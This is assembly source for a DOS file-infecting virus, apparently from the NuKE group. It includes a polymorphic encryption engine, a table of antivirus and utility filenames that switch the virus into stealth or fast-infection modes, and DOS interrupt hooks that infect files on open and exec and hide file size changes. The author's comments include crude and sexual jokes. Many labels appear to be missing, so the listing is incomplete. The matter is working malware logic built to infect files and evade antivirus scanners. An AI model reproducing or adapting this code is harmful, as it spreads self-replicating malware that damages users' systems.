;Bitsettings+stringlength, string
;See StatusBits for bit settings
;The bit settings are * by 8 to give us the bottom 3 bits for our string count
;and the string count can't be bigger than 7......
;We check for the following bits of filename from the begining
;and if found then we set out StatusBits to the bits set here.
;This way we can easily modify what mode the virus is in,
;down side is that if the filenames are changed so that chkdsk is called
;checkds then were screwed. ;( oh well, you can count the smart users on
;1 hand thesedays.
;Time for one last comment before the code ends. N3k0, I am not a Hentai,
;and yes, I do know what it means. Yeah, I do have an asoko, I am mokkori
;after all! hehehehehehe. I should stop reading this damn manga!
db 00010101xb*8+3,"PKZ"
;PKzip, PKZipfix
; StealthFCB+DTA off
; StealthStamp off
; StealthRead off
; FastInfection on
db 00010101xb*8+3,"ARJ"
; StealthFCB+DTA off
; StealthStamp off
; StealthRead off
; FastInfection on
db 00010101xb*8+3,"LHA"
;LHA, LHarc
; StealthFCB+DTA off
; StealthStamp off
; StealthRead off
; FastInfection on
db 00010101xb*8+3,"RAR"
; StealthFCB+DTA off
; StealthStamp off
; StealthRead off
; FastInfection on
db 00010101xb*8+3,"MSB"
; StealthFCB+DTA off
; StealthStamp off
; StealthRead off
; FastInfection on
db 00010101xb*8+3,"CPB"
;Central Point Backup
; StealthFCB+DTA off
; StealthStamp off
; StealthRead off
; FastInfection on
db 00010101xb*8+3,"BAC"
; StealthFCB+DTA off
; StealthStamp off
; StealthRead off
; FastInfection on
db 00000001xb*8+3,"NDD"
;Norton Disk Doctor
; StealthFCB+DTA off
; StealthStamp off
db 00000011xb*8+3,"CHK"
;Chkdsk (Like Edit to Edlin, each to his own)
; StealthFCB+DTA off
; StealthStamp off
; MCB memory stealth
db 00000001xb*8+5,"SCAND"
; StealthFCB+DTA off
; StealthStamp off
db 00000001xb*8+4,"SPEE"
; StealthFCB+DTA off
; StealthStamp off
db 00000001xb*8+3,"DEF"
; StealthFCB+DTA off
; StealthStamp off
db 00010000xb*8+2,"SC"
;Scan (McAfee)
; Fast infection on
db 00010000xb*8+2,"VE"
;Vet Anti-Virus (Aw Fuck, Roger, Vet is the biggest
;piece of shit!)
; Fast infection on.
db 00001000xb*8+2,"IV"
;Invercible (Hahahahaah, is IV a trojan or what? ;)
; Infect files off
db 00010000xb*8+2,"F-"
;F-Prot (Shit dude, /Analyse is killed by a JMP $+2..)
; Fast infection on
db 00001000xb*8+2,"AV"
;AVPro + AVPTsr, etc (Thanks for the trojan.avb)
; Infect files off
db 00001000xb*8+2,"TB"
;TBav family of programs. To be on the safe side, turn
;off infection
; Infect files off... but if they use "own" well..
; not much we can do.. didnt want to waste code with
; a "dos" to "own" code conversion.
db 00010000xb*8+2,"LI"
; (its a great vector)
; Fast infection on
db 00010000xb*8+2,"T."
; (its what i call
; Fast infection on
db 00000010xb*8+3,"MFT"
; MCB memory stealth
db 00000010xb*8+2,"SI"
;SysInfo ??? (Filename from an article in VLAD)
; MCB memory stealth
db 00000010xb*8+2,"MI"
;Memory Info ??? (Filename from an article in VLAD)
; MCB memory stealth
db 00000010xb*8+4,"SYSI"
;SysInfo by Norton
; MCB memory stealth
db 00000010xb*8+3,"MEM"
;Mem from messydos
; MCB memory stealth
db 0 ;no more filenames to check
ModeFilesLen equ $ - ModeChangeFiles
; -----------------------------------------------------------------------------
comment %
include [LADYDETH.PLY]
Lady Death's cosmetic kit,
Yes, it changes the face of your virus, takes those unencrypted wrinkles
out of your life, Lady Death's cosmetic kit works wonders on memory resident
.COM and .EXE infectors, making them look more complex than they really are,
we here at [NuKE] will garuntee that your virus will have that
"just encrypted" look that every young encrypted virus has, or we'll give
you your un-encrypted virus back, free of charge.
;Do you think I have watched too many Oli of Olay adds?
;call with
; es:di = output buffer
; ds:si = input buffer
; ax = delta offset
; bx = length to crypt
; cl = flags
; 00000001 = DS+ES != CS (.EXE files)
; cx = Total encrypted code length + decryption routine
; ds:dx = Decryption routine + encrypted code
mov word ptr [ladyd_delta],ax
mov word ptr [ladyd_length],bx
mov byte ptr [ladyd_status],cl
push es
push di
xor bp,bp
in al,040
and al,(TotalLoops/8*8)+8-1
cmp al,TotalLoops
ja GetJumpMask
mov byte ptr [Ladyd_Jump_Mask],al
in al,040
and al,011xb
mov cl,al
mov bx,0011010101110110xb
; bx--bp--di--si--
;This is the POINTER for the decryption
mov byte ptr [ladyd_pointer2],al
shl cx,2
shr bx,cl
and bl,01111xb
mov dh,bl
in al,040
and al,0111xb
cmp al,dh
je get_poin_reg
cmp al,04 ;sp
je get_poin_reg
mov dl,al
;dl = intel bit specs for COUNTER
;dh = intel bit specs for POINTER
mov word ptr [ladyd_counter],dx
;decide what to set first, pointer or counter?
mov byte ptr [Mov_Fix],0eb
call do_garbage
call do_garbage
mov byte ptr [Mov_Fix],077
call do_garb
mov cx,word ptr [ladyd_length]
mov bx,word ptr [ladyd_delta]
push bx
xor bx,bx
mov bl,byte ptr [ladyd_jump_mask]
shl bx,1
mov bx,word ptr [bx+loop_jumps]
xor ax,ax
test bl,l_sign
je j_NoSign
mov ah,080
test bl,l_cadd
je j_NoCounterAdd
add ax,cx
test bl,l_csub
je j_NoCounterSub
sub ax,cx
test bl,l_aone
je j_NoAddOne
inc ax
test bl,l_sone
je j_NoSubOne
dec ax
mov cx,ax
pop bx
in al,040 ;swapped bx + dx around.
test al,1
xchg ax,dx
je SwivvelItRound
call set_reg
call do_garb
xchg al,ah
xchg cx,bx
call set_reg
mov word ptr [ladyd_adjuster],di
jmp DoneSwivvellenIt
xchg al,ah
xchg cx,bx
call set_reg
mov word ptr [ladyd_adjuster],di
xchg cx,bx
xchg ah,al
call do_garb
call set_reg
test byte ptr [ladyd_status],1
je SkipEXEStuff
in al,040
test al,1
je SkipEXEStuff
call do_garb
xor byte ptr [ladyd_status],1
mov ax,01f0e
cmp byte ptr [ladyd_pointer2],2
jne SavePushPop
mov ah,017 ;50% chance of push cs, pop ss
;50% of push cs, pop ds
SavePushPop: ;50% of CS:
push di
call do_garb
;now create the cryption
test byte ptr [ladyd_status],1
je NoEXEBitMarker
mov al,02e ;save CS:
; xor byte ptr [ladyd_status],1
in al,040
and al,011xb ;111xb
mov ah,al
mov al,080
mov dh,al
;dh = crypt type
;80 = 4 byters = 80, reg+ ##,##
;80 = 4 byters = 80, reg+ ##,##
;80 = 4 byters = 80, reg+ ##,##
mov cx,2 ;2 data
mov bx,offset ladyd_crypt_type2
cmp ah,2
jb KeepCryptType
mov bx,offset ladyd_crypt_type3
in al,040
and al,1
mov dl,al
mov byte ptr [ladyd_type],dl ;44=add,6c=sub,74=xor
add al,byte ptr [ladyd_pointer2]
in al,040
xchg al,ah
in al,040
;al = idex adjuster
;ah = cypher value
mov byte ptr [ladyd_cypher],ah
push ax
xchg al,ah
dec cx
jnz KeepChuggenBytes
call do_garb
pop ax
mov bx,word ptr [ladyd_adjuster]
; 080 to 0ff =
; -80 to -01
; 000 to 07f =
; +00 to +7f
not al
inc ax
add word ptr [bx-2],ax
mov ax,word ptr [ladyd_counter]
xchg al,ah
xor bx,bx
mov bl,byte ptr [ladyd_jump_mask]
shl bx,1
mov bx,word ptr [bx+loop_jumps]
add ax,04040
test bl,l_dec
je DontIncCounter
add ah,08
stosb ;move pointer
xchg al,ah
call do_garb
stosb ;move counter
mov al,bh
stosb ;CondJump opcode
pop bx
mov ax,di
sub ax,bx
not ax
stosb ;backward jump
push di ;garble it.
mov cx,word ptr [ladyd_length]
mov bx,word ptr [ladyd_cypher]
mov al,034
mov ah,bl
cmp bh,074 ;xor, so xor
je ladyd_fixcypher
mov al,02c
cmp bh,044
je ladyd_fixcypher
;bh = 6c
mov al,04
mov word ptr [screw_code],ax
db 0eb,0 ;PIQ killer.
nop ;Hey, dont fuck with the NOPS
nop ;They is powerful instructions.
loop GimmeByteToCrypt
mov si,di
pop di ;di = end of crypt routine.
mov bx,word ptr [ladyd_adjuster]
mov cx,si ;end of total encryption
pop dx,ds ;original es:di
sub cx,dx ;total_encryption end-encryption_start
sub di,dx ;encr_loop - encryption_start
;cx = total_encryption length
;di = length of encryption loop (sort of)
add word ptr [bx-2],di
; cx = total length
;ds:dx = output buffer
call do_lea
jz NoDoLea
add al,0b8
xchg cx,ax
xchg cx,ax
;check the garbling regs in AL with POINTER + COUNTER
;we need to check the 3 bits.
push ax
mov ah,al
and ah,011xb
mov al,byte ptr [ladyd_counter]
and al,011xb
cmp al,ah
je ItsUsed
mov al,byte ptr [ladyd_pointer]
and al,011xb
cmp al,ah
pop ax
in al,040
and ax,(PolyAnd/8*8)+8-1
cmp ax,PolyAnd ;makes 1 or 2 instructions.
ja GimmeMore
xchg cx,ax
push cx
call do_garbage
pop cx
dec cx
jns MoreGarbage
mov bp,sp
mov word ptr [bp],di
push bx
xor bx,bx
push ax
in al,040
cmp al,256/4
ja LeaNoChance
mov al,08d
pop ax
push ax
and al,0111xb
shl al,3
add al,6
inc bx ;use for flag
pop ax
dec bx ;use for flag
pop bx
;Free Chitsukeilen for all females!
;ehehehe, go look that one up in your dictionary!
;*NB* There is no direct translation of that word.
;Thanks to DNAB from "Kiechiis Bloody Sunday" an Ah My Goddess lemon fanfic
;for increasing my japanese vocab by another word.
in ax,040
cmp al,156
Mov_Fix: ja do_mov_garb
cmp al,56
ja do_2_garb
;if al > 156 (100) ;25:64 % of a mov reg,#### cmd
;if al > 56 (100) ;25:64 % of a reg,reg cmd
; 0 (56) ;14:64 % of 1 byte instruction
mov bx,offset ladyd_1_junk
in al,040
and al,011xb
push bx
in al,040
and ax,01000xb
mov cx,ax
shr cx,3
add al,0b0
mov ah,al
in al,040
and al,0111xb
call check_regs
je GimmeMoreRegs
add al,ah
cmp al,0bc ;sp
je GimmeMoreRegs
or cx,cx
je RegNoLea
call do_lea
jz FillValues
in al,040
dec cx
jns FillValues
pop bx
in al,040
mov ah,al
and ah,0111xb
cmp ah,4 ;sp
je do_2_garb
or al,0c0
call check_regs
je do_2_garb
mov ah,al
in al,040
mov bl,al
in al,040
and al,0111xb
cmp al,6 ;no CMP xx,xx
ja do_2_garb
shl al,3
test bl,1
je $+3
inc ax
xchg al,ah
ladyd_crypt_type2: db 044,06c ;add, sub
ladyd_crypt_type3: db 074,074 ;xor, xor
ladyd_jump_mask: db 0
ladyd_1_junk: db 090,0f8,0fb,0fc
;ladyd_2_junk: ;add,or,adc,sbb,and,sub,xor,cmp
;add ax cx dx bx sp bp si di
; 01 c0-c8 c9-cf d0-d8 d9-df e0-e8 e9-ef f0-f8 f9-ff
; 09 x0 = ax = 000
;adc x1 = cx = 001
; 11 x2 = bx = 010
;sbb x3 = dx = 011
; 19 x4 = sp = 100
;and x5 = bp = 101
; 21 x6 = si = 110
;sub x7 = di = 111
; 29
; 31
l_sign equ 00000001xb ;sign
l_cadd equ 00000010xb ;counter add
l_csub equ 00000100xb ;counter sub
l_aone equ 00001000xb ;add 1
l_sone equ 00010000xb ;sub 1
l_inc equ 01000000xb ;inc flow of counter
l_dec equ 10000000xb ;dec flow of counter
TotalLoops equ 12 - 1 ;(We start from 0)
;jno = loop while no overflow
; count = 8000 + (count-1)
; dec counter
db l_dec+l_sign+l_cadd+l_sone, 071
;jno = loop while no overflow
; count = 8000 - count
; inc counter
db l_inc+l_sign+l_csub, 071
;jne = loop while not 0
; count = 0 + count
; dec counter
db l_dec+l_cadd, 075
;jne = loop while not 0
; count = 0 - count
; inc counter
db l_inc+l_csub, 075
;js = loop while sign is on, so count=count+08000
; count = 8000 + (count - 1)
; dec counter
db l_dec+l_sign+l_cadd+l_sone, 078
;js = loop while sign is on, so count= 0-count
; count = 0 - count
; inc counter
db l_inc+l_csub, 078
;jns = loop while no sign
; count = 0 + (count - 1)
; dec counter
db l_dec+l_cadd+l_sone, 079
;jns = loop while no sign
; count = 8000 - count
; inc counter
db l_inc+l_sign+l_csub, 079
;jge = loop while greater than and equal to
; count = 0 + (count - 1)
; dec counter
db l_dec+l_cadd+l_sone, 07d
;jge = loop while greater than and equal to
; count = 8000 - (count - 1)
; inc counter
db l_inc+l_sign+l_csub+l_sone, 07d
;jg = loop while greater than
; count = 0 + count
; dec counter
db l_dec+l_cadd,07f
;jg = loop while greater than
; count = 8000 - (count - 1)
; inc counter
db l_inc+l_sign+l_csub+l_sone, 07f
; -----------------------------------------------------------------------------
db 011h ;Find First FCB stealth
dw StealthSizeFCB
db 012h ;Find Next FCB stealth
dw StealthSizeFCB
db 04Eh ;Find First Handle stealth
dw StealthSizeDTA
db 04Fh ;Find Next Handle stealth
dw StealthSizeDTA
db 03fh ;Read file into memory stealth
dw StealthReadFile
db 040h ;Write file disinfection
dw DisinfectFile
db 043h ;Attribute Function stealth
dw StealthAttrib
db 06Ch ;Extended Open Fast Infection
dw ExtendedOpen
db 03d ;Normal Open Fast Infection
dw InfectVector1
db 04Bh ;Exec Slow Infection
dw InfectVector
db 04c ;Quit prog
dw QuitVector
db 031 ;Resident prog
dw QuitVector
db 0 ;End of table
;The old host code we have to replace
HostSS: dw 0FFF0h ;SS
HostSP: dw 0FFFEh ;SP
HostIP: dw 0100h ;IP
HostCS: dw 0FFF0h ;CS
HostOrig: db 0b8,001,04c ;Old .COM host bytes
db 0cd,021,090 ;In its current structure, this data
;MUST immediatley follow the HostCS
StatusBits: db 00000000xb
; 1 = StealthFCB+DTA Size off, Stamp off
; 1 = MCB memory stealth
; 1 = Stealth read off
; 1 = Infect Files off
; 1 = Fast Infection on
;xxx = Reserved!
;Can't use the top 3 bits in this vers ;)
VirLen equ Virus_End - Virus_Start
db 018 dup (?) ;the EXE header we don't modify
BufLen equ $ - Buffer2
VirLenX equ VirLen + PolySize + BufLen ;This is the length we substract
;for find stealth.
;Virus length, plus a copy of the
;unaltered header, plus the maximum
;size of the generated polymorph code.
MZHEader: dw ? ;The EXE header we DO modify
EXESizeMod512: dd ? ;2
NumRels: dw ? ;6
HeaderParagraphs: dw ? ;8
MinMem: dw ? ;10
MaxMem: dw ? ;12
StackSeg: dw ? ;14
StackPointer: dw ? ;16
CheckSum: dw ? ;18
InstPointer: dw ? ;20
CodeSegment: dw ? ;22
OldAttrib: db ? ;24
FileName: dd ? ;25
FileStamp: dd ? ;29
Int21h: dd ? ;33
Old21h: dd ? ;37
Int24h: dd ? ;41
ladyd_counter: db ? ;44
ladyd_pointer: db ? ;45
ladyd_pointer2: db ? ;46
ladyd_delta: dw ? ;47
ladyd_length: dw ? ;49
ladyd_adjuster: dw ? ;51
ladyd_cypher: db ? ;52
ladyd_type: db ? ;53
ladyd_status: db ? ;54
PolyBuffer: ;This is the buffer for the polygen
VirMem equ (($-Virus_Start)/16) * 2 ;How much prgs do we need to save
db VirLenX - $ dup ? ;Makes the raw .com the same size as
;an infection.. ;) so i dont have to
;convert hex numbers, etc to find out
;its exact infection size.... ;)
;Hehehehe, no more quips I promise!